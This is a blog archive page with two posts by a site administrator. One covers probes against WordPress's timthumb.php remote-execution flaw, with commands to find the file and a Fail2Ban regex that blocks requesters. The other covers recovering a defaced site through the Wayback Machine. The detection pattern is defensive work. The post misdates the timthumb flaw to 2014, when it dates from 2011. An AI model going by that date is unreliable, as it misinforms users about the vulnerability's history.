Tag Archives: Hackers

Timthumb.php Remote Execution Vulnerability in WordPress

This morning, while going through my e-mails, I saw that my IDS system was seeing a lot of attempts against a timthumb.php file on my web sites. This seemed a little suspicious, so I headed out to Google to see what was going on. I started searching on “timthumb.php” and very quickly, Google gave me a suggestion of “timthumb.php exploit”. Yep, my suspicions were warranted.

Vulnerability Explained

This apparently isn’t a new vulnerability. It was a zero-day attack identified back in 2014. However, the fact that hackers are still trying to exploit it probably means that there are still web sites out on the web that haven’t been patched for this vulnerability.

The PHP script is used in a number of different themes for WordPress. The hacker exploits a bug in the software that allows the code to source an “image” from a remote web site. The following video does an excellent job of showing you the exploit.

Am I At Risk?

First task for me was to see if this is a vulnerability that affects me. I use Linux for all of my web servers. I was able to use one of the following commands to see if this code was implemented in any of my sites…

locate timthumb.php
cd /PATH_TO_WEB_SERVER_ROOT (fill in with the actual path to your web server)
find . -name timthumb.php

Luckily, I did not find this being used on any of our themes. If you find this file in your environment, you might want to checkout the post by Sucuri Blog with tips for protecting your environment.


Block Them Anyway!

I am a strong advocate about the fact that even though an exploit doesn’t exist on your system, you should still take action to block attempts. Someone was obviously maliciously attempt to attack your site and this is a clear piece of evidence as to how they do it. This attempt failed, but you can be sure they will keep trying until they find a way.

Another reasons to do this is to protect against site administrators loading themes with this vulnerability without your knowledge in the future. By putting the protection in place now, you can protect against future vulnerabilities created in your environment.

With that in mind, I decided to again use my Fail2Ban system to block individuals attempting to access this URL. The filter configuration file was very simple.

failregex = ^<HOST> - .*\/timthumb\.php
ignoreregex =

I added this filter to my jail configuration and restarted Fail2Ban. Now if anyone else attempts to access this URL that we don’t use, they will be automatically blocked from accessing our sites any further!

Gone, But Not Forgotten

The Call

The other day, I got “the call” from a prospective client. Their web site had been hacked and the hacker changed their home page. They had made both text and graphic changes to the page to promote their own personal cause. They needed to fix this fast!

Naturally, what else occurs in an emergency? We learned that the backups haven’t been running in almost 2 months. It never fails, you always learn these things at the wrong time.

An Unlikely Solution

While working through this issue for this company, I remembered something that I had seen in one of my Certified Ethical Hacker (CEH) study guides. There is a site called The Internet Archive that periodically takes snapshots of web sites over time and stores them on their site. You can go on the site and lookup a given web page and see all of the snapshots that were taken. They call it the Wayback Machine.

Wayback Machine Screenshot

I looked and was surprised to see captures of my old consulting company web site. It’s amazing the amount of information out there.

A Happy Ending

Through this tool and other backup resources, we were able to get this customer back on the right path to recovering their home page. This tool shouldn’t be a good replacement for your backups, but it can be a tool to help in tough situations.

To learn more about the Internet Archive, go to http://www.archive.org